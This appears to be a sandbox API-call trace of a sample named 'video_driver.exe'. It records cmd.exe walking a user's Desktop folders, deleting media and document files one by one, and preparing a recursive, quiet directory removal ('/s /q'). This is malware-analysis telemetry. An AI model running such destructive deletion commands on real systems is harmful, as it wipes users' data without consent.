[0069.896] GetFileType (hFile=0x7) returned 0x2 [0069.897] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.897] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee1ec | out: lpMode=0x3ee1ec) returned 1 [0069.897] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.897] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee220 | out: lpConsoleScreenBufferInfo=0x3ee220) returned 1 [0069.898] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0069.898] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee260 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\Vh5MbuS\\3Ys6XUI1zSfF0RejyCi.pps\r\n") returned 0x60 [0069.898] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x60, lpNumberOfCharsWritten=0x3ee244, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee244*=0x60) returned 1 [0069.899] FindNextFileW (in: hFindFile=0x7c3100, lpFindFileData=0x7de27c | out: lpFindFileData=0x7de27c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x294ff160, ftCreationTime.dwHighDateTime=0x1d5e2e9, ftLastAccessTime.dwLowDateTime=0x7693c150, ftLastAccessTime.dwHighDateTime=0x1d5e64e, ftLastWriteTime.dwLowDateTime=0x7693c150, ftLastWriteTime.dwHighDateTime=0x1d5e64e, nFileSizeHigh=0x0, nFileSizeLow=0x129b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bQZSK5g-r9Y.m4a", cAlternateFileName="BQZSK5~1.M4A")) returned 1 [0069.899] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\Vh5MbuS\\bQZSK5g-r9Y.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\vh5mbus\\bqzsk5g-r9y.m4a")) returned 1 [0069.900] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.900] GetFileType (hFile=0x7) returned 0x2 [0069.900] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.900] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee1ec | out: lpMode=0x3ee1ec) returned 1 [0069.900] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.900] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee220 | out: lpConsoleScreenBufferInfo=0x3ee220) returned 1 [0069.901] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0069.901] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee260 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\Vh5MbuS\\bQZSK5g-r9Y.m4a\r\n") returned 0x58 [0069.901] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x58, lpNumberOfCharsWritten=0x3ee244, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee244*=0x58) returned 1 [0069.902] FindNextFileW (in: hFindFile=0x7c3100, lpFindFileData=0x7de27c | out: lpFindFileData=0x7de27c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fbdfa40, ftCreationTime.dwHighDateTime=0x1d5e3ad, ftLastAccessTime.dwLowDateTime=0xc60ca300, ftLastAccessTime.dwHighDateTime=0x1d5de29, ftLastWriteTime.dwLowDateTime=0xc60ca300, ftLastWriteTime.dwHighDateTime=0x1d5de29, nFileSizeHigh=0x0, nFileSizeLow=0x6ab1, dwReserved0=0x0, dwReserved1=0x0, cFileName="uP-NbOmTzAJhw.mp4", cAlternateFileName="UP-NBO~1.MP4")) returned 1 [0069.902] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\Vh5MbuS\\uP-NbOmTzAJhw.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\vh5mbus\\up-nbomtzajhw.mp4")) returned 1 [0069.902] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.902] GetFileType (hFile=0x7) returned 0x2 [0069.902] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.902] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee1ec | out: lpMode=0x3ee1ec) returned 1 [0069.903] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.903] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee220 | out: lpConsoleScreenBufferInfo=0x3ee220) returned 1 [0069.903] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0069.903] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee260 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\Vh5MbuS\\uP-NbOmTzAJhw.mp4\r\n") returned 0x5a [0069.903] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x5a, lpNumberOfCharsWritten=0x3ee244, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee244*=0x5a) returned 1 [0069.904] FindNextFileW (in: hFindFile=0x7c3100, lpFindFileData=0x7de27c | out: lpFindFileData=0x7de27c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68ef0420, ftCreationTime.dwHighDateTime=0x1d5dc1b, ftLastAccessTime.dwLowDateTime=0xbcec6f00, ftLastAccessTime.dwHighDateTime=0x1d5e098, ftLastWriteTime.dwLowDateTime=0xbcec6f00, ftLastWriteTime.dwHighDateTime=0x1d5e098, nFileSizeHigh=0x0, nFileSizeLow=0x16291, dwReserved0=0x0, dwReserved1=0x0, cFileName="yMkqzqM.ots", cAlternateFileName="")) returned 1 [0069.904] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\Vh5MbuS\\yMkqzqM.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\vh5mbus\\ymkqzqm.ots")) returned 1 [0069.905] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.905] GetFileType (hFile=0x7) returned 0x2 [0069.906] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.906] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee1ec | out: lpMode=0x3ee1ec) returned 1 [0069.906] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.906] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee220 | out: lpConsoleScreenBufferInfo=0x3ee220) returned 1 [0069.907] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0069.907] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee260 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\Vh5MbuS\\yMkqzqM.ots\r\n") returned 0x54 [0069.907] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x54, lpNumberOfCharsWritten=0x3ee244, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee244*=0x54) returned 1 [0069.908] FindNextFileW (in: hFindFile=0x7c3100, lpFindFileData=0x7de27c | out: lpFindFileData=0x7de27c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68ef0420, ftCreationTime.dwHighDateTime=0x1d5dc1b, ftLastAccessTime.dwLowDateTime=0xbcec6f00, ftLastAccessTime.dwHighDateTime=0x1d5e098, ftLastWriteTime.dwLowDateTime=0xbcec6f00, ftLastWriteTime.dwHighDateTime=0x1d5e098, nFileSizeHigh=0x0, nFileSizeLow=0x16291, dwReserved0=0x0, dwReserved1=0x0, cFileName="yMkqzqM.ots", cAlternateFileName="")) returned 0 [0069.908] GetLastError () returned 0x12 [0069.908] FindClose (in: hFindFile=0x7c3100 | out: hFindFile=0x7c3100) returned 1 [0069.908] GetProcessHeap () returned 0x7b0000 [0069.908] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7de270 | out: hHeap=0x7b0000) returned 1 [0069.908] GetProcessHeap () returned 0x7b0000 [0069.908] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x78) returned 0x7c6708 [0069.908] GetProcessHeap () returned 0x7b0000 [0069.908] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x18) returned 0x7c3100 [0069.908] GetProcessHeap () returned 0x7b0000 [0069.908] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x78) returned 0x7c6788 [0069.908] GetProcessHeap () returned 0x7b0000 [0069.908] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x808) returned 0x7de270 [0069.908] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\Vh5MbuS\\*", fInfoLevelId=0x0, lpFindFileData=0x7de27c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x7de27c) returned 0x7c93a8 [0069.909] FindNextFileW (in: hFindFile=0x7c93a8, lpFindFileData=0x7de2b4 | out: lpFindFileData=0x7de2b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe759f710, ftCreationTime.dwHighDateTime=0x1d5e7d9, ftLastAccessTime.dwLowDateTime=0x779b140, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x779b140, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.909] FindNextFileW (in: hFindFile=0x7c93a8, lpFindFileData=0x7de2ec | out: lpFindFileData=0x7de2ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0069.909] GetLastError () returned 0x12 [0069.909] FindClose (in: hFindFile=0x7c93a8 | out: hFindFile=0x7c93a8) returned 1 [0069.909] GetProcessHeap () returned 0x7b0000 [0069.909] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x10) returned 0x7c0350 [0069.909] GetProcessHeap () returned 0x7b0000 [0069.909] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c0350 | out: hHeap=0x7b0000) returned 1 [0069.909] GetProcessHeap () returned 0x7b0000 [0069.909] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7de270 | out: hHeap=0x7b0000) returned 1 [0069.909] GetProcessHeap () returned 0x7b0000 [0069.909] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c6788 | out: hHeap=0x7b0000) returned 1 [0069.909] GetProcessHeap () returned 0x7b0000 [0069.909] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c3100 | out: hHeap=0x7b0000) returned 1 [0069.909] GetProcessHeap () returned 0x7b0000 [0069.909] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c6708 | out: hHeap=0x7b0000) returned 1 [0069.909] GetProcessHeap () returned 0x7b0000 [0069.909] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c6688 | out: hHeap=0x7b0000) returned 1 [0069.909] GetProcessHeap () returned 0x7b0000 [0069.909] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c30e0 | out: hHeap=0x7b0000) returned 1 [0069.909] GetProcessHeap () returned 0x7b0000 [0069.909] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c8b98 | out: hHeap=0x7b0000) returned 1 [0069.910] GetProcessHeap () returned 0x7b0000 [0069.910] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c3070 | out: hHeap=0x7b0000) returned 1 [0069.910] GetProcessHeap () returned 0x7b0000 [0069.910] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c47a8 | out: hHeap=0x7b0000) returned 1 [0069.910] GetProcessHeap () returned 0x7b0000 [0069.910] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c3000 | out: hHeap=0x7b0000) returned 1 [0069.910] GetProcessHeap () returned 0x7b0000 [0069.910] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c2f90 | out: hHeap=0x7b0000) returned 1 [0069.910] GetProcessHeap () returned 0x7b0000 [0069.910] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c4788 | out: hHeap=0x7b0000) returned 1 [0069.910] GetProcessHeap () returned 0x7b0000 [0069.910] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c2780 | out: hHeap=0x7b0000) returned 1 [0069.910] GetProcessHeap () returned 0x7b0000 [0069.910] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c2720 | out: hHeap=0x7b0000) returned 1 [0069.910] GetProcessHeap () returned 0x7b0000 [0069.910] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c65d0 | out: hHeap=0x7b0000) returned 1 [0069.910] GetProcessHeap () returned 0x7b0000 [0069.910] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c26c0 | out: hHeap=0x7b0000) returned 1 [0069.910] GetProcessHeap () returned 0x7b0000 [0069.910] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c2660 | out: hHeap=0x7b0000) returned 1 [0069.910] GetProcessHeap () returned 0x7b0000 [0069.910] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c0338 | out: hHeap=0x7b0000) returned 1 [0069.910] GetProcessHeap () returned 0x7b0000 [0069.910] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c2600 | out: hHeap=0x7b0000) returned 1 [0069.910] GetProcessHeap () returned 0x7b0000 [0069.910] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c6370 | out: hHeap=0x7b0000) returned 1 [0069.910] GetProcessHeap () returned 0x7b0000 [0069.910] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c6158 | out: hHeap=0x7b0000) returned 1 [0069.910] GetProcessHeap () returned 0x7b0000 [0069.910] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c60f0 | out: hHeap=0x7b0000) returned 1 [0069.911] GetProcessHeap () returned 0x7b0000 [0069.911] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c5e90 | out: hHeap=0x7b0000) returned 1 [0069.911] GetProcessHeap () returned 0x7b0000 [0069.911] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c5e58 | out: hHeap=0x7b0000) returned 1 [0069.911] GetProcessHeap () returned 0x7b0000 [0069.911] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7bf7e8 | out: hHeap=0x7b0000) returned 1 [0069.911] GetProcessHeap () returned 0x7b0000 [0069.911] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c5df8 | out: hHeap=0x7b0000) returned 1 [0069.911] GetProcessHeap () returned 0x7b0000 [0069.911] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c5d78 | out: hHeap=0x7b0000) returned 1 [0069.911] GetProcessHeap () returned 0x7b0000 [0069.911] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x2c) returned 0x7c4788 [0069.911] GetProcessHeap () returned 0x7b0000 [0069.911] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c02f0, Size=0xe) returned 0x7c0338 [0069.911] GetProcessHeap () returned 0x7b0000 [0069.911] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c0338) returned 0xe [0069.911] GetProcessHeap () returned 0x7b0000 [0069.911] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c0308, Size=0x10) returned 0x7c02f0 [0069.911] GetProcessHeap () returned 0x7b0000 [0069.911] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c02f0) returned 0x10 [0069.911] GetProcessHeap () returned 0x7b0000 [0069.911] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xb0) returned 0x7c5d78 [0069.911] GetProcessHeap () returned 0x7b0000 [0069.911] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c5d78, Size=0x5e) returned 0x7c5d78 [0069.911] GetProcessHeap () returned 0x7b0000 [0069.911] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c5d78) returned 0x5e [0069.911] GetProcessHeap () returned 0x7b0000 [0069.912] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x58) returned 0x7c5de0 [0069.912] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", fInfoLevelId=0x1, lpFindFileData=0x3ef190, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ef190) returned 0x7bf7e8 [0069.912] GetProcessHeap () returned 0x7b0000 [0069.912] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x258) returned 0x7c5e40 [0069.912] _wcsicmp (_String1="*", _String2=".") returned -4 [0069.912] _wcsicmp (_String1="*", _String2="..") returned -4 [0069.912] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\*")) returned 0xffffffff [0069.912] GetLastError () returned 0x7b [0069.912] GetProcessHeap () returned 0x7b0000 [0069.912] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x58) returned 0x7c60a0 [0069.912] GetProcessHeap () returned 0x7b0000 [0069.912] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c60a0, Size=0x5a) returned 0x7c60a0 [0069.912] GetProcessHeap () returned 0x7b0000 [0069.912] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c60a0) returned 0x5a [0069.912] FindNextFileW (in: hFindFile=0x7bf7e8, lpFindFileData=0x3ef190 | out: lpFindFileData=0x3ef190*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ca268, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.912] GetProcessHeap () returned 0x7b0000 [0069.912] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c60a0, Size=0x5e) returned 0x7c60a0 [0069.912] GetProcessHeap () returned 0x7b0000 [0069.912] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c60a0) returned 0x5e [0069.913] FindNextFileW (in: hFindFile=0x7bf7e8, lpFindFileData=0x3ef190 | out: lpFindFileData=0x3ef190*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x7ca268, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0069.913] FindNextFileW (in: hFindFile=0x7bf7e8, lpFindFileData=0x3ef190 | out: lpFindFileData=0x3ef190*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc0d4740, ftCreationTime.dwHighDateTime=0x1d5e3d3, ftLastAccessTime.dwLowDateTime=0x408f480, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x408f480, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ca268, dwReserved1=0x0, cFileName="mfZck7HwXf4SziBj", cAlternateFileName="")) returned 1 [0069.913] GetProcessHeap () returned 0x7b0000 [0069.913] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c60a0, Size=0x7e) returned 0x7c60a0 [0069.913] GetProcessHeap () returned 0x7b0000 [0069.913] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c60a0) returned 0x7e [0069.913] GetProcessHeap () returned 0x7b0000 [0069.913] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x400a) returned 0x7de270 [0069.914] GetProcessHeap () returned 0x7b0000 [0069.914] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7de270, Size=0x20) returned 0x7de270 [0069.914] GetProcessHeap () returned 0x7b0000 [0069.914] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7de270) returned 0x20 [0069.914] GetProcessHeap () returned 0x7b0000 [0069.914] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x400a) returned 0x7de298 [0069.914] GetProcessHeap () returned 0x7b0000 [0069.914] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7de298, Size=0x108) returned 0x7de298 [0069.914] GetProcessHeap () returned 0x7b0000 [0069.914] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7de298) returned 0x108 [0069.914] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3eeea4 | out: _Buffer="\r\n") returned 2 [0069.914] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.914] GetFileType (hFile=0x7) returned 0x2 [0069.914] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.914] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3eee64 | out: lpMode=0x3eee64) returned 1 [0069.915] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.915] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3eee90, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3eee90*=0x2) returned 1 [0069.915] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0069.916] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.916] _vsnwprintf (in: _Buffer=0x4a415e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3eeea0 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0069.916] _vsnwprintf (in: _Buffer=0x4a415e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x3eeea0 | out: _Buffer=">") returned 1 [0069.916] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.916] GetFileType (hFile=0x7) returned 0x2 [0069.916] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.916] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3eee68 | out: lpMode=0x3eee68) returned 1 [0069.916] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.916] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a415e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3eee94, lpReserved=0x0 | out: lpBuffer=0x4a415e40*, lpNumberOfCharsWritten=0x3eee94*=0x26) returned 1 [0069.917] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.917] GetFileType (hFile=0x7) returned 0x2 [0069.917] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.917] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef0ec | out: lpMode=0x3ef0ec) returned 1 [0069.917] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.917] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7de278*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x3ef118, lpReserved=0x0 | out: lpBuffer=0x7de278*, lpNumberOfCharsWritten=0x3ef118*=0x5) returned 1 [0069.918] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3ef124 | out: _Buffer=" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mfZck7HwXf4SziBj\" /s /q ") returned 64 [0069.918] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.918] GetFileType (hFile=0x7) returned 0x2 [0069.918] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.918] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef0e4 | out: lpMode=0x3ef0e4) returned 1 [0069.918] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.918] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x40, lpNumberOfCharsWritten=0x3ef110, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef110*=0x40) returned 1 [0069.919] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3ef144 | out: _Buffer="\r\n") returned 2 [0069.919] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.919] GetFileType (hFile=0x7) returned 0x2 [0069.920] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.920] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef104 | out: lpMode=0x3ef104) returned 1 [0069.920] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.920] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3ef130, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef130*=0x2) returned 1 [0069.921] GetConsoleTitleW (in: lpConsoleTitle=0x3eecb4, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0069.921] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x108) returned 0x7c6128 [0069.921] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c6128, Size=0x8c) returned 0x7c6128 [0069.921] GetProcessHeap () returned 0x7b0000 [0069.921] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c6128) returned 0x8c [0069.921] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x94) returned 0x7c61c0 [0069.921] GetProcessHeap () returned 0x7b0000 [0069.921] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x108) returned 0x7c6260 [0069.922] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c6260, Size=0x8c) returned 0x7c6260 [0069.922] GetProcessHeap () returned 0x7b0000 [0069.922] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c6260) returned 0x8c [0069.922] 